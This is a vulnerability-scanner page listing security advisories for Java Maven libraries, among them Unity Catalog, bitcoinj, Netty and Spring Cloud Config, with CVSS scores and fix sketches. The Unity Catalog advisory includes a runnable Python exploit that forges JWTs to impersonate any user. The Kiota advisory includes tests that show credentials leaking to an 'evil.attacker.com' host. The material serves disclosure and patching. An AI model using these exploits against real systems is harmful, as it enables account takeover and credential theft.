🛡️ Vuln Watch
Package Vulnerability Scanner
🕐 Last updated:
⏭️ Next update:
⏳ Remaining: 00:00
Total: 242213
Results: 6347
Page: 1/127
📡 Sources:
Critical
📦 io.unitycatalog:unitycatalog-server 📌 All versions < 0.1.0, 0.2.0, 0.2.1, 0.3.0, 0.3.1 ⛓️‍💥 Supply chain attack ☕ Java Maven library 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 **Context:** A critical authentication bypass vulnerability exists in the Unity Catalog token exchange endpoint (/api/1.0/unity-control/auth/tokens). The endpoint extracts the issuer (iss) claim from incoming JWTs and uses it to dynamically fetch the JWKS endpoint for signature v...
📅 2026-05-11 OSV/Maven 🔗 Details

Full description

**Context:** A critical authentication bypass vulnerability exists in the Unity Catalog token exchange endpoint (/api/1.0/unity-control/auth/tokens). The endpoint extracts the issuer (iss) claim from incoming JWTs and uses it to dynamically fetch the JWKS endpoint for signature validation without validating that the issuer is a trusted identity provider.

**Way to exploit:** An attacker can exploit this by:

1. Hosting their own OIDC-compliant server with a valid JWKS endpoint
2. Signing a JWT with their own private key, setting the iss claim to their server
3. Setting the sub/email claim to any known user in the Unity Catalog system
4. Exchanging this crafted token for a valid internal access token

This results in complete impersonation of any user in the system, granting access to all catalogs, schemas, tables, and other resources that user has permissions to. Additionally, the implementation does not validate the audience (aud) claim, allowing tokens intended for other services to be used.

**Example:** Example implementation doing token exchange with a self-hosted `.well-known/openid-configuration` and `jwks` endpoint. This can be run with `python3 main.py`, with `TARGET_USER`, `UC_SERVER` and `PORT` adjusted to the testing setup.
```python
#!/usr/bin/env python3
"""Unity Catalog JWT Issuer Validation Bypass PoC - Minimal Version"""
import base64, secrets, threading, time
from datetime import datetime, timedelta, timezone

import jwt, requests
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from flask import Flask, jsonify

TARGET_USER = "user@example.com"
UC_SERVER = "http://localhost:8080"
PORT = 8888
ISSUER = f"http://localhost:{PORT}"

# Generate RSA key pair
key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
kid = secrets.token_hex(8)

# Create JWKS
pub = key.public_key().public_numbers()

def b64(n):
    return base64.urlsafe_b64encode(n.to_bytes((n.bit_length()+7)//8, "big")).rstrip(b"=").decode()

jwks = {"keys": [{"kty": "RSA", "use": "sig", "alg": "RS256", "kid": kid,
                  "n": b64(pub.n), "e": b64(pub.e)}]}

# Create malicious JWT
token = jwt.encode(
    {"iss": ISSUER, "sub": TARGET_USER, "email": TARGET_USER, "aud": "unity-catalog",
     "iat": datetime.now(timezone.utc),
     "exp": datetime.now(timezone.utc) + timedelta(hours=1)},
    key.private_bytes(serialization.Encoding.PEM, serialization.PrivateFormat.PKCS8,
                      serialization.NoEncryption()),
    algorithm="RS256", headers={"kid": kid}
)

# Start minimal OIDC server
app = Flask(__name__)
app.logger.disabled = True

@app.route("/.well-known/openid-configuration")
def oidc():
    return jsonify({"issuer": ISSUER, "jwks_uri": f"{ISSUER}/jwks"})

@app.route("/jwks")
def keys():
    return jsonify(jwks)

threading.Thread(target=lambda: app.run(port=PORT, threaded=True, use_reloader=False),
                 daemon=True).start()
time.sleep(1)

# Exchange token
resp = requests.post(f"{UC_SERVER}/api/1.0/unity-control/auth/tokens",
                     data={"grant_type": "urn:ietf:params:oauth:grant-type:token-exchange",
                           "requested_token_type": "urn:ietf:params:oauth:token-type:access_token",
                           "subject_token_type": "urn:ietf:params:oauth:token-type:id_token",
                           "subject_token": token})
if resp.status_code == 200:
    access_token = resp.json()["access_token"]
    print(f"[+] Got access token as '{TARGET_USER}'")
    # Demo: list catalogs
    catalogs = requests.get(f"{UC_SERVER}/api/2.1/unity-catalog/catalogs",
                            headers={"Authorization": f"Bearer {access_token}"})
    print(catalogs.json())
else:
    print(f"[-] Failed: {resp.status_code} {resp.text}")
```
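A hedged sketch of the server-side fix the advisory implies: before any JWKS lookup, check the `iss` claim against a configured allowlist of trusted identity providers, and verify the `aud` claim. The constant and function names below are illustrative, not Unity Catalog's actual API.

```python
# Illustrative names only; not Unity Catalog's actual configuration keys.
TRUSTED_ISSUERS = {"https://idp.example.com"}
EXPECTED_AUDIENCE = "unity-catalog"

def check_token_claims(claims: dict) -> None:
    """Reject the token before any JWKS fetch happens for an untrusted issuer."""
    issuer = claims.get("iss")
    if issuer not in TRUSTED_ISSUERS:
        raise PermissionError(f"untrusted issuer: {issuer!r}")
    aud = claims.get("aud")
    audiences = aud if isinstance(aud, list) else [aud]
    if EXPECTED_AUDIENCE not in audiences:
        raise PermissionError(f"token not intended for this service: {aud!r}")
```

With such a check in place, the PoC above fails at the first step: the attacker-hosted issuer never reaches the JWKS-fetch stage.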

Affected versions

All versions < 0.1.0, 0.2.0, 0.2.1, 0.3.0, 0.3.1

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

High
📦 com.ritense.valtimo:web 📌 12.10.0.RELEASE, 12.10.1.RELEASE, 12.10.2.RELEASE, 12.11.0.RELEASE, 12.12.0.RELEASE ⛓️‍💥 Supply chain attack ☕ Java Maven library 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ### Summary The `LoggingRestClientCustomizer` in the `web` module automatically intercepts all outgoing HTTP calls made via Spring's `RestClient` and logs the full request body, response body, and response headers. When an error response is received, this information is included...
📅 2026-05-11 OSV/Maven 🔗 Details

Full description

### Summary

The `LoggingRestClientCustomizer` in the `web` module automatically intercepts all outgoing HTTP calls made via Spring's `RestClient` and logs the full request body, response body, and response headers. When an error response is received, this information is included in the thrown `HttpClientErrorException` message, which is logged at ERROR level by Spring's default exception handling — regardless of the application's DEBUG log level setting.

### Impact

The logged data can contain highly sensitive information including:

- Authentication credentials (JWT tokens, API keys, OAuth tokens) in request bodies or response headers
- Personal data (BSN, email addresses, case details) in request/response bodies
- Session tokens in `Set-Cookie` response headers

This data is exposed to:

- Anyone with access to application logs (stdout/log files)
- Users with access to logging aggregation tools (e.g. Grafana/Loki)
- Any Valtimo user with the admin role, through the built-in logging module (since Valtimo 12.5.0)

Leaked authentication credentials could be used to impersonate the Valtimo application against the target external API (e.g. ZGW services), compromising that API's security boundary.

Related: GHSA-hfrg-mcvw-8mch (similar sensitive data exposure in InboxHandlingService)

### Affected Code

`com.ritense.valtimo.web.logging.LoggingRestClientCustomizer#intercept` in the `web` module.

### Patched Versions

The vulnerability is fixed in:

- **12.33.0** (v12 release line) — see PR #600
- **13.26.0** (v13 release line) — see PR #599

The fix removes the request/response report, headers, and response body from the `HttpClientErrorException` constructor; only the HTTP status code and status text remain. The full request/response report is still emitted at DEBUG level (disabled in production).

### Mitigation

If you cannot upgrade to a patched version immediately, consider:

- Restricting access to application logs and the Valtimo logging module
- Adjusting the log level for `com.ritense.valtimo.web.logging` to WARN or higher (note: this only mitigates the DEBUG logging path; error responses still leak data via the exception message)
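A language-agnostic sketch of the underlying defence (Python for brevity): redact credential-bearing headers before any request/response report is built, so neither a DEBUG log line nor an exception message can carry secrets. The header list is an assumption for illustration, not Valtimo's actual configuration.

```python
# Assumed header names; extend to match whatever your clients actually send.
SENSITIVE_HEADERS = {"authorization", "cookie", "set-cookie",
                     "proxy-authorization", "x-api-key"}

def redact_headers(headers: dict) -> dict:
    """Return a copy of the headers that is safe to embed in logs or exceptions."""
    return {name: ("<redacted>" if name.lower() in SENSITIVE_HEADERS else value)
            for name, value in headers.items()}
```

The key design point mirrors the upstream fix: redaction happens at report-building time, so every downstream sink (DEBUG log, ERROR log, exception message) sees only sanitized data.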

Affected versions

12.10.0.RELEASE, 12.10.1.RELEASE, 12.10.2.RELEASE, 12.11.0.RELEASE, 12.12.0.RELEASE

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N

High
📦 com.oviva.telematik:epa4all-client 📌 All versions < rc.0, 0.0.4, 0.0.5, 0.0.7, 0.0.8 ⛓️‍💥 Supply chain attack ☕ Java Maven library 🎯 Local network ⚪ Not exploited 🟢 Patched
💬 ### Impact In SignedPublicKeysTrustValidatorImpl.isTrusted(), the ECDSA signature verification at line 45 discards the boolean return value of Signature.verify(). The method performs certificate chain validation, OCSP check, and signature algorithm setup, but never checks whether...
📅 2026-05-08 OSV/Maven 🔗 Details

Full description

### Impact

In SignedPublicKeysTrustValidatorImpl.isTrusted(), the ECDSA signature verification at line 45 discards the boolean return value of Signature.verify(). The method performs certificate chain validation, OCSP check, and signature algorithm setup, but never checks whether the signature actually matches. For any structurally valid signature, it returns true.

### Patches

Patched in [#34](https://github.com/oviva-ag/epa4all-client/pull/34).

### Workarounds

None.

### Resources

- [MS-OVIVA-EPA4ALL-d76aec](https://www.machinespirits.com/advisory/d76aec/)

### Credits

[Machine Spirits](https://machinespirits.com) (contact@machinespirits.de)

- Dr. rer. nat. Simon Weber
- Dipl.-Inf. Volker Schönefeld
- Chiara Fliegner
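The bug class is easy to reproduce in any language: the verification is computed but its boolean result is dropped. A minimal Python sketch of the correct pattern, using an HMAC comparison as a stand-in for the Java `Signature.verify()` call (the names here are illustrative, not the library's API):

```python
import hashlib
import hmac

def is_trusted(payload: bytes, signature: bytes, key: bytes) -> bool:
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    # The vulnerable pattern computes the check and ignores its result:
    #     hmac.compare_digest(expected, signature)  # value discarded -> always "trusted"
    # The fix is simply to propagate the boolean to the caller:
    return hmac.compare_digest(expected, signature)
```

Linters and compilers flag this class of bug in Java too (e.g. ErrorProne's check for ignored return values), which is one reason discarded `verify()` results are worth gating in CI.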

Affected versions

All versions < rc.0, 0.0.4, 0.0.5, 0.0.7, 0.0.8

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

High
📦 org.bitcoinj:bitcoinj-core 📌 All versions < 0.15, 0.15.1, 0.15.10, 0.15.2, 0.15.3 ⛓️‍💥 Supply chain attack ☕ Java Maven library 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ### Summary `ScriptExecution.correctlySpends()` contains two fast-path verification bugs for standard `P2PKH` and native `P2WPKH` spends in `core/src/main/java/org/bitcoinj/script/ScriptExecution.java`. In both branches, bitcoinj verifies an attacker-controlled signature/public-...
📅 2026-05-08 OSV/Maven 🔗 Details

Full description

### Summary

`ScriptExecution.correctlySpends()` contains two fast-path verification bugs for standard `P2PKH` and native `P2WPKH` spends in `core/src/main/java/org/bitcoinj/script/ScriptExecution.java`. In both branches, bitcoinj verifies an attacker-controlled signature/public-key pair but fails to verify that the public key is the one committed to by the output being spent. As a result, any attacker keypair can satisfy bitcoinj's local verification for arbitrary `P2PKH` and `P2WPKH` outputs. This doesn't affect the SPV (simplified payment verification) trust model, as this model follows PoW and doesn't verify input signatures at all.

### Details

The issue is in the optimized branches of `ScriptExecution.correctlySpends(...)`.

In the `P2PKH` fast path at `core/src/main/java/org/bitcoinj/script/ScriptExecution.java:1042`, the code:

- parses the attacker-supplied signature from `scriptSig`
- parses the attacker-supplied public key from `scriptSig`
- computes the sighash against the victim output's `scriptPubKey`
- checks only `pubkey.verify(sigHash, signature)`

It never enforces the missing `P2PKH` binding:

- `HASH160(pubkey) == ScriptPattern.extractHashFromP2PKH(scriptPubKey)`

That means the `OP_DUP OP_HASH160 <hash> OP_EQUALVERIFY OP_CHECKSIG` semantics are not actually enforced in this fast path.
Relevant code:

```java
} else if (ScriptPattern.isP2PKH(scriptPubKey)) {
    if (chunks.size() != 2)
        throw new ScriptException(...);
    TransactionSignature signature;
    try {
        byte[] data = Objects.requireNonNull(chunks.get(0).data);
        signature = TransactionSignature.decodeFromBitcoin(data, true, true);
    } catch (SignatureDecodeException x) {
        throw new ScriptException(...);
    }
    ECKey pubkey = ECKey.fromPublicOnly(Objects.requireNonNull(chunks.get(1).data));
    Sha256Hash sigHash = txContainingThis.hashForSignature(scriptSigIndex, scriptPubKey,
            signature.sigHashMode(), false);
    boolean validSig = pubkey.verify(sigHash, signature);
    if (!validSig)
        throw new ScriptException(...);
}
```

In the native `P2WPKH` fast path at `core/src/main/java/org/bitcoinj/script/ScriptExecution.java:1023`, the bug is similar. The code:

- reads the attacker-supplied pubkey from `witness`
- builds `scriptCode` from that attacker pubkey with `ScriptBuilder.createP2PKHOutputScript(pubkey)`
- computes the BIP143 sighash using that attacker-derived `scriptCode`
- verifies the signature against the attacker pubkey

It never enforces:

- `HASH160(pubkey) == ScriptPattern.extractHashFromP2WH(scriptPubKey)`

So for `P2WPKH`, the attacker controls both the pubkey and the `scriptCode` used for signing.
Relevant code:

```java
if (ScriptPattern.isP2WPKH(scriptPubKey)) {
    Objects.requireNonNull(witness);
    if (witness.getPushCount() < 2)
        throw new ScriptException(...);
    TransactionSignature signature;
    try {
        signature = TransactionSignature.decodeFromBitcoin(witness.getPush(0), true, true);
    } catch (SignatureDecodeException x) {
        throw new ScriptException(...);
    }
    ECKey pubkey = ECKey.fromPublicOnly(witness.getPush(1));
    Script scriptCode = ScriptBuilder.createP2PKHOutputScript(pubkey);
    Sha256Hash sigHash = txContainingThis.hashForWitnessSignature(scriptSigIndex, scriptCode,
            value, signature.sigHashMode(), false);
    boolean validSig = pubkey.verify(sigHash, signature);
    if (!validSig)
        throw new ScriptException(...);
}
```

Affected call sites include:

- `core/src/main/java/org/bitcoinj/core/TransactionInput.java:546`
- `core/src/main/java/org/bitcoinj/wallet/Wallet.java:4520`
- `core/src/main/java/org/bitcoinj/signers/LocalTransactionSigner.java:84`
- `core/src/main/java/org/bitcoinj/signers/CustomTransactionSigner.java:77`

These call sites use `correctlySpends()` for transaction/input validation and pre-signing checks. Any application that treats a successful result from this path as proof that a spend is valid is affected.

### Fix

The issue is fixed on the `release-0.17` branch via 2bc5653c41d260d840692bc554690d4d79208f9c, and on `master` via b575a682acf614b9ff95cacbdeb48f86c3ababe0. A 0.17.1 maintenance release has been made available on Maven Central.
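The missing check is a one-line binding between the supplied pubkey and the hash committed in the output script. A hedged Python sketch of the pattern, using SHA-256 as a stand-in digest (real P2PKH/P2WPKH outputs commit to HASH160(pubkey), i.e. RIPEMD160(SHA256(pubkey)); all names here are illustrative):

```python
import hashlib

def pubkey_matches_commitment(pubkey: bytes, committed_hash: bytes) -> bool:
    """Enforce that the spender's pubkey is the one the output committed to.
    SHA-256 stands in for Bitcoin's HASH160 for illustration only."""
    return hashlib.sha256(pubkey).digest() == committed_hash

def verify_spend(pubkey: bytes, committed_hash: bytes, sig_ok: bool) -> bool:
    # The bitcoinj fast path checked only sig_ok; both checks are required.
    return sig_ok and pubkey_matches_commitment(pubkey, committed_hash)
```

Without the binding check, `verify_spend` collapses to `sig_ok`, which any attacker keypair can satisfy for its own signature — exactly the failure described above.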

Affected versions

All versions < 0.15, 0.15.1, 0.15.10, 0.15.2, 0.15.3

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Unspecified
📦 io.netty:netty-codec-mqtt 📌 4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5 ⛓️‍💥 Supply chain attack ☕ Java Maven library 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ### Impact The MQTT 5 header Properties section is parsed and buffered _before_ any message size limit is applied. Specifically, in `MqttDecoder`, the `decodeVariableHeader()` method is called before the `bytesRemainingBeforeVariableHeader > maxBytesInMessage` check. The `decode...
📅 2026-05-07 OSV/Maven 🔗 Details

Full description

### Impact

The MQTT 5 header Properties section is parsed and buffered _before_ any message size limit is applied. Specifically, in `MqttDecoder`, the `decodeVariableHeader()` method is called before the `bytesRemainingBeforeVariableHeader > maxBytesInMessage` check. The `decodeVariableHeader()` can call other methods which will call `decodeProperties()`. Effectively, Netty does not apply any limits to the size of the properties being decoded.

Additionally, because `MqttDecoder` extends `ReplayingDecoder`, Netty will repeatedly re-parse the enormous Properties sections and buffer the bytes in memory, until the entire thing parses to completion. This can cause high resource usage in both CPU and memory.

### Resources

- `ANT-2026-09608`
- https://docs.oasis-open.org/mqtt/mqtt/v5.0/os/mqtt-v5.0-os.html#_Toc3901027
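The safe ordering can be sketched in a few lines: decode the packet's Remaining Length (MQTT's Variable Byte Integer, at most four bytes) and reject oversized messages before touching the variable header or its Properties. Names are illustrative, not Netty's.

```python
def decode_remaining_length(data: bytes, max_bytes_in_message: int) -> tuple[int, int]:
    """Decode MQTT's Variable Byte Integer, then enforce the size cap
    *before* any property parsing begins. Returns (value, bytes_consumed)."""
    value, shift, i = 0, 0, 0
    while True:
        if i >= 4:  # the spec allows at most 4 bytes for Remaining Length
            raise ValueError("malformed Remaining Length")
        byte = data[i]
        value |= (byte & 0x7F) << shift
        shift += 7
        i += 1
        if not byte & 0x80:  # high bit clear means last byte
            break
    if value > max_bytes_in_message:
        raise ValueError(f"message of {value} bytes exceeds limit {max_bytes_in_message}")
    return value, i
```

The point is purely the ordering: the cheap length check runs to completion before any allocation-heavy Properties decoding starts, so an attacker cannot force buffering by declaring a huge Properties section.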

Affected versions

4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

4.4/10 Medium
📦 org.springframework.cloud:spring-cloud-config-server 📌 3.1.0, 3.1.1, 3.1.10, 3.1.2, 3.1.3 🗄️ Server ☕ Java Maven library ⚡ CWE-532 🎯 Local ⚪ Not exploited
💬 When enabling trace logging in Spring Cloud Config Server sensitive information was placed in plain text in the logs. Spring Cloud Config 3.1.x: affected from 3.1.0 through 3.1.13 (inclusive); upgrade to 3.1.14 or greater (Enterprise Support Only). Spring Cloud Config 4.1.x: affe...
📅 2026-05-07 NVD 🔗 Details

Full description

When enabling trace logging in Spring Cloud Config Server sensitive information was placed in plain text in the logs.

- Spring Cloud Config 3.1.x: affected from 3.1.0 through 3.1.13 (inclusive); upgrade to 3.1.14 or greater (Enterprise Support Only).
- Spring Cloud Config 4.1.x: affected from 4.1.0 through 4.1.9 (inclusive); upgrade to 4.1.10 or greater (Enterprise Support Only).
- Spring Cloud Config 4.2.x: affected from 4.2.0 through 4.2.6 (inclusive); upgrade to 4.2.7 or greater (Enterprise Support Only).
- Spring Cloud Config 4.3.x: affected from 4.3.0 through 4.3.2 (inclusive); upgrade to 4.3.3 or greater.
- Spring Cloud Config 5.0.x: affected from 5.0.0 through 5.0.2 (inclusive); upgrade to 5.0.3 or greater.

Affected versions

3.1.0, 3.1.1, 3.1.10, 3.1.2, 3.1.3

Vulnerability type

CWE-532 — Insertion of Sensitive Information into Log File

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

7.2/10 High
📦 org.springframework.cloud:spring-cloud-config-server 📌 3.1.0, 3.1.1, 3.1.10, 3.1.2, 3.1.3 🗄️ Server ☕ Java Maven library ⚡ CWE-367 🎯 Local ⚪ Not exploited
💬 The base directory (`spring.cloud.config.server.git.basedir`) used by the Spring Cloud Config Server to clone Git repositories to is susceptible to time-of-check-time-of-use (TOCTOU) attacks. Spring Cloud Config 3.1.x: affected from 3.1.0 through 3.1.13 (inclusive); upgrade to 3....
📅 2026-05-07 NVD 🔗 Details

Full description

The base directory (`spring.cloud.config.server.git.basedir`) used by the Spring Cloud Config Server to clone Git repositories to is susceptible to time-of-check-time-of-use (TOCTOU) attacks.

- Spring Cloud Config 3.1.x: affected from 3.1.0 through 3.1.13 (inclusive); upgrade to 3.1.14 or greater (Enterprise Support Only).
- Spring Cloud Config 4.1.x: affected from 4.1.0 through 4.1.9 (inclusive); upgrade to 4.1.10 or greater (Enterprise Support Only).
- Spring Cloud Config 4.2.x: affected from 4.2.0 through 4.2.6 (inclusive); upgrade to 4.2.7 or greater (Enterprise Support Only).
- Spring Cloud Config 4.3.x: affected from 4.3.0 through 4.3.2 (inclusive); upgrade to 4.3.3 or greater.
- Spring Cloud Config 5.0.x: affected from 5.0.0 through 5.0.2 (inclusive); upgrade to 5.0.3 or greater.
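The general TOCTOU-resistant pattern for a clone base directory can be sketched briefly (illustrative only; this is not Spring Cloud Config's actual fix): create the directory atomically with owner-only permissions rather than checking whether it exists and then using it.

```python
import os
import stat
import tempfile

def make_private_basedir(prefix: str = "config-repo-") -> str:
    """mkdtemp creates the directory atomically with mode 0700, so there is
    no check-then-use window in which an attacker can swap in a symlink
    or pre-create a world-writable directory at the expected path."""
    return tempfile.mkdtemp(prefix=prefix)

def basedir_mode(path: str) -> int:
    # lstat, not stat: we want the directory itself, never a symlink target.
    return stat.S_IMODE(os.lstat(path).st_mode)
```

The design choice is that creation and permissioning happen in one system call, eliminating the race window that a separate "does it exist?" check would open.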

Affected versions

3.1.0, 3.1.1, 3.1.10, 3.1.2, 3.1.3

Vulnerability type

CWE-367 — Time-of-Check Time-of-Use (TOCTOU) Race Condition

CVSS Vector

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N

9.1/10 Critical
📦 org.springframework.cloud:spring-cloud-config-server 📌 3.1.0, 3.1.1, 3.1.10, 3.1.2, 3.1.3 🗄️ Server ☕ Java Maven library ⚡ Path Traversal 🎯 Remote ⚪ Not exploited
💬 Spring Cloud Config allows applications to serve arbitrary text and binary files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead to a directory traversal attack. Spring Cloud Config 3.1.x...
📅 2026-05-07 NVD 🔗 Details

Full description

Spring Cloud Config allows applications to serve arbitrary text and binary files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead to a directory traversal attack.

- Spring Cloud Config 3.1.x: affected from 3.1.0 through 3.1.13 (inclusive); upgrade to 3.1.14 or greater (Enterprise Support Only).
- Spring Cloud Config 4.1.x: affected from 4.1.0 through 4.1.9 (inclusive); upgrade to 4.1.10 or greater (Enterprise Support Only).
- Spring Cloud Config 4.2.x: affected from 4.2.0 through 4.2.6 (inclusive); upgrade to 4.2.7 or greater (Enterprise Support Only).
- Spring Cloud Config 4.3.x: affected from 4.3.0 through 4.3.2 (inclusive); upgrade to 4.3.3 or greater.
- Spring Cloud Config 5.0.x: affected from 5.0.0 through 5.0.2 (inclusive); upgrade to 5.0.3 or greater.
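The generic defence for this bug class is short (illustrative sketch, not the actual Spring Cloud Config patch): normalize the requested path and verify it is still inside the serving root before opening anything. Note that `resolve()` also follows symlinks, which this sketch does not separately harden against.

```python
from pathlib import Path

def resolve_inside(base: Path, requested: str) -> Path:
    """Reject any request that escapes the base directory after normalization."""
    root = base.resolve()
    candidate = (root / requested).resolve()
    if candidate != root and root not in candidate.parents:
        raise ValueError(f"path escapes base directory: {requested!r}")
    return candidate
```

Checking containment on the *resolved* path is the crucial step: a naive string prefix check on the raw input is defeated by `..` segments and by prefixes like `/srv/config-evil`.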

Affected versions

3.1.0, 3.1.1, 3.1.10, 3.1.2, 3.1.3

Vulnerability type

CWE-22 — Path Traversal

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

7.5/10 High
📦 org.springframework.cloud:spring-cloud-config 📌 3.1.0, 3.1.1, 3.1.10, 3.1.2, 3.1.3 🗄️ Server ☕ Java Maven library ⚡ IDOR 🎯 Remote ⚪ Not exploited
💬 When using Google Secrets Manager as a backend for the Spring Cloud Config server a client can craft a request to the config server potentially exposing secrets from unintended GCP projects. Spring Cloud Config 3.1.x: affected from 3.1.0 through 3.1.13 (inclusive); upgrade to 3.1...
📅 2026-05-07 NVD 🔗 Details

Full description

When using Google Secrets Manager as a backend for the Spring Cloud Config server a client can craft a request to the config server potentially exposing secrets from unintended GCP projects.

- Spring Cloud Config 3.1.x: affected from 3.1.0 through 3.1.13 (inclusive); upgrade to 3.1.14 or greater (Enterprise Support Only).
- Spring Cloud Config 4.1.x: affected from 4.1.0 through 4.1.9 (inclusive); upgrade to 4.1.10 or greater (Enterprise Support Only).
- Spring Cloud Config 4.2.x: affected from 4.2.0 through 4.2.6 (inclusive); upgrade to 4.2.7 or greater (Enterprise Support Only).
- Spring Cloud Config 4.3.x: affected from 4.3.0 through 4.3.2 (inclusive); upgrade to 4.3.3 or greater.
- Spring Cloud Config 5.0.x: affected from 5.0.0 through 5.0.2 (inclusive); upgrade to 5.0.3 or greater.

Affected versions

3.1.0, 3.1.1, 3.1.10, 3.1.2, 3.1.3

Vulnerability type

CWE-639 — IDOR

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

High
📦 com.microsoft.kiota:microsoft-kiota-abstractions 📌 All versions < 0.1.2, 0.10.0, 0.11.0, 0.11.1, 0.11.2 📟 Device ☕ Java Maven library 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ### Summary The RedirectHandler middleware in microsoft/kiota-java (com.microsoft.kiota:microsoft-kiota-http-okHttp v1.9.0) and other Kiota libraries fails to strip sensitive HTTP headers when following 3xx redirects to a different host or scheme. This vulnerability is present ...
📅 2026-05-07 OSV/Maven 🔗 Details

Full description

### Summary

The RedirectHandler middleware in microsoft/kiota-java (com.microsoft.kiota:microsoft-kiota-http-okHttp v1.9.0) and other Kiota libraries fails to strip sensitive HTTP headers when following 3xx redirects to a different host or scheme.

This vulnerability is present in the RedirectHandlers for:

- https://github.com/microsoft/kiota-dotnet
- https://github.com/microsoft/kiota-java
- https://github.com/microsoft/kiota-python
- https://github.com/microsoft/kiota-typescript
- https://github.com/microsoft/kiota-http-go

### Details

Only the Authorization header is removed; Cookie, Proxy-Authorization, and all custom headers are forwarded to the redirect target. This is the default middleware in every kiota-java HTTP client created via KiotaClientFactory.create(). OkHttp's built-in redirect handler (which handles this correctly) is explicitly disabled at line 63 of KiotaClientFactory.java in favor of kiota's broken implementation.

Vulnerable code in RedirectHandler.java lines 107-116 (getRedirect method) in versions 1.9.0 and earlier:

```
boolean sameScheme = locationUrl.scheme().equalsIgnoreCase(requestUrl.scheme());
boolean sameHost = locationUrl.host().toString().equalsIgnoreCase(requestUrl.host().toString());
if (!sameScheme || !sameHost) {
    requestBuilder.removeHeader("Authorization");
    // BUG: Cookie, Proxy-Authorization, and all other headers are NOT removed
}
```

### PoC

1. Clone the repository:

   git clone --depth 1 https://github.com/microsoft/kiota-java.git
   cd kiota-java

2. Create the PoC test file at `components/http/okHttp/src/test/java/com/microsoft/kiota/http/middleware/SecurityPoC.java` with this content:

```
package com.microsoft.kiota.http.middleware;

import static org.junit.jupiter.api.Assertions.*;

import com.microsoft.kiota.http.KiotaClientFactory;
import okhttp3.*;
import okhttp3.mockwebserver.*;
import org.junit.jupiter.api.Test;

public class SecurityPoC {
    @Test
    void crossHostRedirectLeaksCookies() throws Exception {
        Request original = new Request.Builder()
                .url("http://trusted.example.com/api")
                .addHeader("Authorization", "Bearer token")
                .addHeader("Cookie", "session=SECRET")
                .addHeader("Proxy-Authorization", "Basic cHJveHk6cGFzcw==")
                .build();
        Response redirect = new Response.Builder()
                .request(original).protocol(Protocol.HTTP_1_1)
                .code(302).message("Found")
                .header("Location", "http://evil.attacker.com/steal")
                .body(ResponseBody.create("", MediaType.parse("text/plain")))
                .build();
        Request result = new RedirectHandler().getRedirect(original, redirect);
        assertNotNull(result);
        assertEquals("evil.attacker.com", result.url().host());
        assertNull(result.header("Authorization")); // stripped (good)
        assertEquals("session=SECRET", result.header("Cookie")); // LEAKED
        assertEquals("Basic cHJveHk6cGFzcw==", result.header("Proxy-Authorization")); // LEAKED
    }

    @Test
    void endToEndProof() throws Exception {
        var evil = new MockWebServer();
        evil.start();
        evil.enqueue(new MockResponse().setResponseCode(200));
        var trusted = new MockWebServer();
        trusted.start();
        trusted.enqueue(new MockResponse().setResponseCode(302)
                .setHeader("Location", evil.url("/steal")));
        OkHttpClient client = KiotaClientFactory.create(
                new Interceptor[]{new RedirectHandler()}).build();
        client.newCall(new Request.Builder().url(trusted.url("/api"))
                .addHeader("Cookie", "session=SECRET").build()).execute();
        trusted.takeRequest();
        RecordedRequest captured = evil.takeRequest();
        assertEquals("session=SECRET", captured.getHeader("Cookie")); // LEAKED to evil server
        evil.shutdown();
        trusted.shutdown();
    }
}
```

3. Run the tests:

   ./gradlew :components:http:okHttp:test --tests "com.microsoft.kiota.http.middleware.SecurityPoC"

4. Result: BUILD SUCCESSFUL, 2 tests passed, 0 failures. Both tests confirm Cookie and Proxy-Authorization headers are sent to the attacker's server on cross-host redirect.

### Impact

The kiota-java bug is more severe because it leaks ALL sensitive headers simultaneously (Cookie + Proxy-Authorization + custom auth headers), not just one type.

Attack scenario: An attacker who can trigger a cross-origin redirect from a trusted API (via open redirect, MITM, or DNS rebinding) captures the victim's session cookies, proxy credentials, and API keys from the redirected request.

Impact:

- Session hijacking via leaked Cookie headers
- Corporate proxy credential theft via leaked Proxy-Authorization
- API key theft via leaked custom auth headers (X-API-Key, etc.)

All consumers of kiota-java are affected, including Microsoft Graph SDK for Java.
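The behaviour the advisory asks for can be sketched in a few lines (Python for brevity; the header set is an assumption for illustration): on any redirect that changes scheme or host, drop every credential-bearing header, not just Authorization.

```python
from urllib.parse import urlsplit

# Assumed set of credential-bearing headers; extend as needed.
SENSITIVE = {"authorization", "cookie", "proxy-authorization", "x-api-key"}

def headers_for_redirect(headers: dict, from_url: str, to_url: str) -> dict:
    """Strip credential-bearing headers when a redirect crosses origin."""
    src, dst = urlsplit(from_url), urlsplit(to_url)
    same_origin = (src.scheme.lower(), src.netloc.lower()) == \
                  (dst.scheme.lower(), dst.netloc.lower())
    if same_origin:
        return dict(headers)
    return {k: v for k, v in headers.items() if k.lower() not in SENSITIVE}
```

This mirrors what OkHttp's built-in redirect handling already does for its own headers, which is why disabling it in favor of a partial reimplementation is the root of the bug.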

Affected versions

